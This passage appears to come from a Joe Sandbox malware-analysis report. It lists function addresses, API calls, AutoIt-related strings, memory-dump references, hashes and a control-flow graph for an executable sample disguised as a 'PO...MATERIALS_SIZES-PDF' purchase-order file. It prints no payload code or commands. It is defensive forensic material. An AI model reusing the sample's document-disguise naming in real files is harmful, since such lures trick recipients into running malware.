                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EB55,0040D86E), ref: 0040EB7B
                                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EB8D
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                                            • String ID: IsThemeActive$uxtheme.dll
                                                                                                                                                                                                                                                                                                            • API String ID: 2574300362-3542929980
                                                                                                                                                                                                                                                                                                            • Opcode ID: 9e55e894ab04f38af4b02d6559f2dae0f2ca0bab174211e780b997e8b6ae5f43
                                                                                                                                                                                                                                                                                                            • Instruction ID: e8120cabfd18d8fe06d2f96d8b82b2b5a4bcadd10797c678d2963416b1e4c3b8
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9e55e894ab04f38af4b02d6559f2dae0f2ca0bab174211e780b997e8b6ae5f43
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 05D0C9B49407039AD7306F72C918B0A7BE4AB50342F204C3EF996A1694DBBCD0508B28
                                                                                                                                                                                                                                                                                                            Function 00410B90 Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 167registryCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00410C44
                                                                                                                                                                                                                                                                                                            • __wsplitpath.LIBCMT ref: 00410C61
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                                                                                                                                                                                                                                                            • _wcsncat.LIBCMT ref: 00410C78
                                                                                                                                                                                                                                                                                                            • __wmakepath.LIBCMT ref: 00410C94
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00413E3C: __wmakepath_s.LIBCMT ref: 00413E52
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                                                                                                                                                                                                            • _wcscpy.LIBCMT ref: 00410CCC
                                                                                                                                                                                                                                                                                                            • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00020019,?), ref: 00410CE9
                                                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32 ref: 00429BE4
                                                                                                                                                                                                                                                                                                            • _wcscat.LIBCMT ref: 00429C43
                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00429C55
                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00429C66
                                                                                                                                                                                                                                                                                                            • _wcscat.LIBCMT ref: 00429C80
                                                                                                                                                                                                                                                                                                            • _wcsncpy.LIBCMT ref: 00429CC0
                                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00429CDE
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: _wcscat_wcslen$CloseException@8FileModuleNameOpenQueryThrowValue__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpystd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                                                                                                                                                                                                                            • String ID: Include$Software\AutoIt v3\AutoIt$\
                                                                                                                                                                                                                                                                                                            • API String ID: 1004883554-2276155026
                                                                                                                                                                                                                                                                                                            • Opcode ID: bd70d1de0bf944503d0c9583a27c2bfe501ff96b935e7e88766a5686d489513a
                                                                                                                                                                                                                                                                                                            • Instruction ID: ef4714a7fd58501e566ba693257e1f196c1b97611c18bc9c35ab262cfa7686fb
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bd70d1de0bf944503d0c9583a27c2bfe501ff96b935e7e88766a5686d489513a
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B961B3B1508340DFC300EF65EC8599BBBE8FB99704F44882EF544C3261EBB59948CB5A
                                                                                                                                                                                                                                                                                                            Function 004095C7 Relevance: 21.5, APIs: 14, Instructions: 539sleeptimeCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00409A40: _wcslen.LIBCMT ref: 00409A61
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00409A40: CharUpperBuffW.USER32(?,?), ref: 00409AF5
                                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(0000000A), ref: 00409870
                                                                                                                                                                                                                                                                                                            • timeGetTime.WINMM ref: 00409880
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: BuffCharSleepTimeUpper_wcslentime
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 3219444185-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 5ce5c73b473f4c1786c7b3a9dde6c4f3658cc2c253e02c8b8019e841656f04ca
                                                                                                                                                                                                                                                                                                            • Instruction ID: 79dfb759edd1749a95aa3438e3198289cebfc990e9c1b7da565b255c5aac8c6d
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5ce5c73b473f4c1786c7b3a9dde6c4f3658cc2c253e02c8b8019e841656f04ca
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D422F171608342ABC724DF64C984BABB7A0BF89304F14492FE54997392D77CEC45CB9A
                                                                                                                                                                                                                                                                                                            Function 004523CE Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 145COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: __fread_nolock$_fseek_wcscpy
                                                                                                                                                                                                                                                                                                            • String ID: FILE
                                                                                                                                                                                                                                                                                                            • API String ID: 3888824918-3121273764
                                                                                                                                                                                                                                                                                                            • Opcode ID: e8200e6015bbe3313da03f0c122791b2111f624a8fcd35516e511649d5e709ac
                                                                                                                                                                                                                                                                                                            • Instruction ID: c0f9aeb359a44d31a21a8716142a7f32772eb03c7b5129f1ec28ea3a2d041f76
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e8200e6015bbe3313da03f0c122791b2111f624a8fcd35516e511649d5e709ac
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D541EFB1504300BBD310EB55CC81FEB73A9AFC8718F54491EFA8457181F679E644C7AA
                                                                                                                                                                                                                                                                                                            Function 004102F0 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • GetSysColorBrush.USER32 ref: 00410326
                                                                                                                                                                                                                                                                                                            • RegisterClassExW.USER32 ref: 00410359
                                                                                                                                                                                                                                                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,?), ref: 0041036A
                                                                                                                                                                                                                                                                                                            • InitCommonControlsEx.COMCTL32(0000000F,?,?,?,?,?,?), ref: 0041038A
                                                                                                                                                                                                                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,?,?,?,?,?), ref: 0041039A
                                                                                                                                                                                                                                                                                                            • LoadIconW.USER32(00400000,000000A9), ref: 004103B1
                                                                                                                                                                                                                                                                                                            • ImageList_ReplaceIcon.COMCTL32(00C0DF98,000000FF,00000000,?,?,?,?,?,?), ref: 004103C1
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                                                                                                                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                                                                                                                                                            • API String ID: 2914291525-1005189915
                                                                                                                                                                                                                                                                                                            • Opcode ID: b078764552fc12f322907e2d646497bc841117f43cad8f480623bc49e689b681
                                                                                                                                                                                                                                                                                                            • Instruction ID: c8c51aded5b6d43d10953d3ded2c15c159303f3bf9a059b11759766ceadcbce4
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b078764552fc12f322907e2d646497bc841117f43cad8f480623bc49e689b681
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9F2129B4518301AFD340DF64D888B4EBFF4FB89704F008A2EF685962A0E7B58144CF5A
                                                                                                                                                                                                                                                                                                            Function 004101F0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 74windowregistryCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 004101F9
                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00410209
                                                                                                                                                                                                                                                                                                            • LoadIconW.USER32(?,00000063), ref: 0041021F
                                                                                                                                                                                                                                                                                                            • LoadIconW.USER32(?,000000A4), ref: 00410232
                                                                                                                                                                                                                                                                                                            • LoadIconW.USER32(?,000000A2), ref: 00410245
                                                                                                                                                                                                                                                                                                            • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041026A
                                                                                                                                                                                                                                                                                                            • RegisterClassExW.USER32 ref: 004102C6
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004102F0: GetSysColorBrush.USER32 ref: 00410326
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004102F0: RegisterClassExW.USER32 ref: 00410359
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004102F0: RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,?), ref: 0041036A
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004102F0: InitCommonControlsEx.COMCTL32(0000000F,?,?,?,?,?,?), ref: 0041038A
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004102F0: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,?,?,?,?,?), ref: 0041039A
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004102F0: LoadIconW.USER32(00400000,000000A9), ref: 004103B1
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004102F0: ImageList_ReplaceIcon.COMCTL32(00C0DF98,000000FF,00000000,?,?,?,?,?,?), ref: 004103C1
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                                                                                                                                                            • String ID: #$0$PGH
                                                                                                                                                                                                                                                                                                            • API String ID: 423443420-3673556320
                                                                                                                                                                                                                                                                                                            • Opcode ID: 1033d1e55498f891403c4089579710d7d6683e73571bc8446147a2c837657170
                                                                                                                                                                                                                                                                                                            • Instruction ID: 6be78a7d21e01e6533eb66d2751721d4fd39e3055bf34e10baa21603515e7cea
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1033d1e55498f891403c4089579710d7d6683e73571bc8446147a2c837657170
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 60216DB5A18300AFD310CF59EC84A4A7FE4FB99710F00497FF648972A0D7B599408B99
                                                                                                                                                                                                                                                                                                            Function 00452574 Relevance: 13.7, APIs: 9, Instructions: 171COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • _fseek.LIBCMT ref: 004525DA
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004523ED
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 00452432
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045244F
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 0045247D
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045248E
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004524AB
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 004524D9
                                                                                                                                                                                                                                                                                                            • __fread_nolock.LIBCMT ref: 00452618
                                                                                                                                                                                                                                                                                                            • __fread_nolock.LIBCMT ref: 00452629
                                                                                                                                                                                                                                                                                                            • __fread_nolock.LIBCMT ref: 00452644
                                                                                                                                                                                                                                                                                                            • __fread_nolock.LIBCMT ref: 00452661
                                                                                                                                                                                                                                                                                                            • _fseek.LIBCMT ref: 0045267D
                                                                                                                                                                                                                                                                                                            • _malloc.LIBCMT ref: 00452689
                                                                                                                                                                                                                                                                                                            • _malloc.LIBCMT ref: 00452696
                                                                                                                                                                                                                                                                                                            • __fread_nolock.LIBCMT ref: 004526A7
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: __fread_nolock$_fseek_malloc_wcscpy
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 1911931848-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 3570a21b3fd7755177810c9e6035fea9311faeeb4ffbf150b354229a8e607498
                                                                                                                                                                                                                                                                                                            • Instruction ID: daf5751c9f96f1f9c2235ce4d63c31b1673d17b5fb5ed0b9a51dc370059b243a
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3570a21b3fd7755177810c9e6035fea9311faeeb4ffbf150b354229a8e607498
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 47514CB1A08340AFD310DF5AD881A9BF7E9FFC8704F40492EF68887241D77AE5448B5A
                                                                                                                                                                                                                                                                                                            Function 0040F450 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 126COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                                            control_flow_graph 1294 40f450-40f45c call 425210 1297 40f460-40f478 1294->1297 1297->1297 1298 40f47a-40f4a8 call 413990 call 410f70 1297->1298 1303 40f4b0-40f4d1 call 4151b0 1298->1303 1306 40f531 1303->1306 1307 40f4d3-40f4da 1303->1307 1308 40f536-40f540 1306->1308 1309 40f4dc-40f4de 1307->1309 1310 40f4fd-40f517 call 41557c 1307->1310 1311 40f4e0-40f4e2 1309->1311 1314 40f51c-40f51f 1310->1314 1313 40f4e6-40f4ed 1311->1313 1315 40f521-40f52c 1313->1315 1316 40f4ef-40f4f2 1313->1316 1314->1303 1319 40f543-40f54e 1315->1319 1320 40f52e-40f52f 1315->1320 1317 42937a-4293a0 call 41557c call 4151b0 1316->1317 1318 40f4f8-40f4fb 1316->1318 1331 4293a5-4293c3 call 4151d0 1317->1331 1318->1310 1318->1311 1321 40f550-40f553 1319->1321 1322 40f555-40f560 1319->1322 1320->1316 1321->1316 1324 429372 1322->1324 1325 40f566-40f571 1322->1325 1324->1317 1327 429361-429367 1325->1327 1328 40f577-40f57a 1325->1328 1327->1313 1330 42936d 1327->1330 1328->1316 1330->1324 1331->1308
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: __fread_nolock_fseek_strcat
                                                                                                                                                                                                                                                                                                            • String ID: AU3!$EA06
                                                                                                                                                                                                                                                                                                            • API String ID: 3818483258-2658333250
                                                                                                                                                                                                                                                                                                            • Opcode ID: 61a815b4762265f9d00ad5303640aa958846bc8ab5516fbcebd88596bc1aced3
                                                                                                                                                                                                                                                                                                            • Instruction ID: a326fe91d6bb541f17a8cee8b09d92be642ba4032c5aa5fe266a96c6f27d1a6c
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 61a815b4762265f9d00ad5303640aa958846bc8ab5516fbcebd88596bc1aced3
